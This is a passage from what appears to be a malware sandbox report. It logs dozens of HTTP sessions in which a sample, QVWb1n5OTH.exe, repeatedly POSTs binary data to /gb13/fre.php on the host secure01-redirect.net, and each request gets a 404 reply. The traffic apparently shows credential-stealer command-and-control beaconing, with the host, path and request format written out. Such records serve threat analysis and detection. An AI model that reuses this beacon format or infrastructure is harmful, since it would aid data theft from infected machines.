                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:46.152134895 CET392INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:45 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            43192.168.11.204986385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:46.584131956 CET405OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:47.480717897 CET406INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:46 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            44192.168.11.204986485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:47.907329082 CET406OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:48.817679882 CET407INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:48 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            45192.168.11.204986585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:49.281672955 CET407OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:50.157217979 CET408INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:49 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            46192.168.11.204986685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:50.592369080 CET409OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:51.396393061 CET409INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:50 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            47192.168.11.204986785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:51.839160919 CET410OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:52.788822889 CET410INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:52 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            48192.168.11.204986885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:53.201684952 CET411OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:54.020001888 CET412INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:53 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            49192.168.11.204986985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:54.454766035 CET412OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:55.184012890 CET413INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:54 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.11.204982085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:50.786489964 CET210OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:51.721692085 CET210INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:51 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            50192.168.11.204987085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:55.607712030 CET414OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:56.478455067 CET414INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:55 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            51192.168.11.204987185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:56.921782970 CET415OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:57.820014000 CET415INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:57 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            52192.168.11.204987285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:58.263796091 CET416OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:59.185625076 CET417INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:58 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            53192.168.11.204987385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:59.639554024 CET417OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:00.354649067 CET418INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:59 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            54192.168.11.204987485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:00.776411057 CET419OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:01.736181974 CET419INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:01 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            55192.168.11.204987585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:02.137849092 CET420OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:02.989849091 CET420INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:02 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            56192.168.11.204987685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:03.428535938 CET421OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:04.170003891 CET422INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:03 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            57192.168.11.204987785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:04.613176107 CET422OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:08.511713982 CET423INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:07 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            58192.168.11.204987885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:08.954344034 CET424OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:09.656017065 CET424INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:09 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            59192.168.11.204987985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:10.088146925 CET425OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:10.955699921 CET425INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:10 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.11.204982185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:52.360769033 CET211OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:53.252924919 CET211INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:52 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            60192.168.11.204988085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:11.407655001 CET426OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:12.312880993 CET427INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:11 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            61192.168.11.204988185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:12.756398916 CET427OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:13.570595980 CET428INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:12 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            62192.168.11.204988285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:14.012530088 CET429OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:14.953397989 CET430INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:14 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            63192.168.11.204988385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:15.367855072 CET430OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:16.218813896 CET437INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:15 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            64192.168.11.204988585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:16.560492039 CET438OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:17.397265911 CET439INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:16 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            65192.168.11.204988685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:17.819770098 CET439OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:18.778842926 CET440INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:18 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            66192.168.11.204988785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:19.191035986 CET440OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:20.104265928 CET441INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:19 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            67192.168.11.204988885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:20.535988092 CET442OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:21.394350052 CET442INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:20 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            68192.168.11.204988985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
